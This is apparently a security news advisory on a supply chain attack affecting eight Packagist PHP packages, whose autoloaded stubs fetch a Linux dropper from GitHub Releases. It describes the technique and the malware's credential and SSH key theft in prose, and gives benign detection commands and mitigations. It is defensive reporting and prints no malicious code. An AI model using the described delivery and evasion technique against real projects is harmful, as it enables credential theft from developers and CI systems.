Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A new coordinated supply chain attack campaign has compromised eight packages on Packagist, the primary Composer package registry for the PHP ecosystem. The campaign uses a novel technique that retrieves malicious Linux binaries from GitHub Releases URLs rather than embedding the payload directly in the package code — a method designed to evade static analysis and repository scanning tools.

Attack Methodology

Security researchers at Socket identified what they describe as a "coordinated" campaign with several notable technical characteristics:

Payload delivery via GitHub Releases: Rather than bundling malicious code directly within the Composer package, the attack injects a small stub that fetches and executes a Linux binary hosted on GitHub's own CDN infrastructure (github.com/releases/...). This approach exploits the trust that security tools often extend to GitHub-hosted content.

No modification to composer.json: The malicious code was injected into PHP files within the package, not into the composer.json manifest. This bypasses naive dependency auditing that only inspects manifest files without examining actual package contents.

Autoload execution: The malicious stub was inserted into files loaded via Composer's autoloader, ensuring the payload executes whenever the package is loaded — including during composer install in CI/CD pipelines.

The Eight Affected Packages

Researchers identified eight compromised Packagist packages across multiple popular categories. While the specific package names are being withheld pending notification of maintainers, the affected packages collectively have hundreds of thousands of installations. The campaign targeted packages in the following categories:

• Utility and helper libraries
• HTTP client wrappers
• Data validation packages
• Database abstraction layers

Malware Capabilities

The Linux binary payload retrieved from GitHub Releases is a multi-stage dropper with the following capabilities:

• Credential harvesting from environment files and application configuration
• SSH key exfiltration from developer and CI runner home directories
• Persistence installation via cron jobs and systemd unit files
• Lateral movement by scanning local network segments for additional targets
• Process hollowing to hide ongoing activity from process monitoring tools

The binary targets Linux environments specifically, consistent with the typical operating environment of CI/CD runners and containerized PHP applications.

Detection and Response

Packagist and GitHub have been notified and are working to remove the compromised packages and take down the malicious GitHub Releases content. However, any projects that installed affected packages during the attack window should assume compromise.

Detection indicators to check:

# Check for unexpected cron jobs added recently
crontab -l
cat /etc/cron.d/*
 
# Check for new systemd services
systemctl list-units --type=service --state=running | grep -v standard
 
# Review composer.lock for recently installed packages
git diff HEAD~7 composer.lock
 
# Audit recently created files in home directories
find ~ -newer /etc/passwd -type f 2>/dev/null

Recommended Mitigations

1. Run composer audit to check installed packages against known vulnerability databases — note this won't catch all supply chain attacks but provides a baseline
2. Review composer.lock and cross-reference installed package versions against the official Packagist registry
3. Rotate all credentials accessible from affected CI/CD environments — cloud credentials, API keys, SSH keys, repository tokens
4. Re-image compromised hosts rather than attempting cleanup of potentially rooted systems
5. Enable Composer content-hash verification to detect package tampering

Broader Trend

This attack is the latest in a growing series targeting the PHP/Packagist ecosystem. Unlike npm, which has recently introduced staged publishing controls, Packagist currently lacks equivalent review mechanisms — meaning compromised maintainer accounts or hijacked package repositories can push malicious versions with minimal friction.

Security researchers are urging Packagist to adopt mandatory 2FA for maintainers of high-impact packages and to introduce package content scanning comparable to what npm and PyPI have implemented.

The use of GitHub's own infrastructure as a malware delivery channel is a reminder that URL allowlisting and content trust based on hostname alone is insufficient — organizations should implement binary execution controls and content inspection regardless of the download source.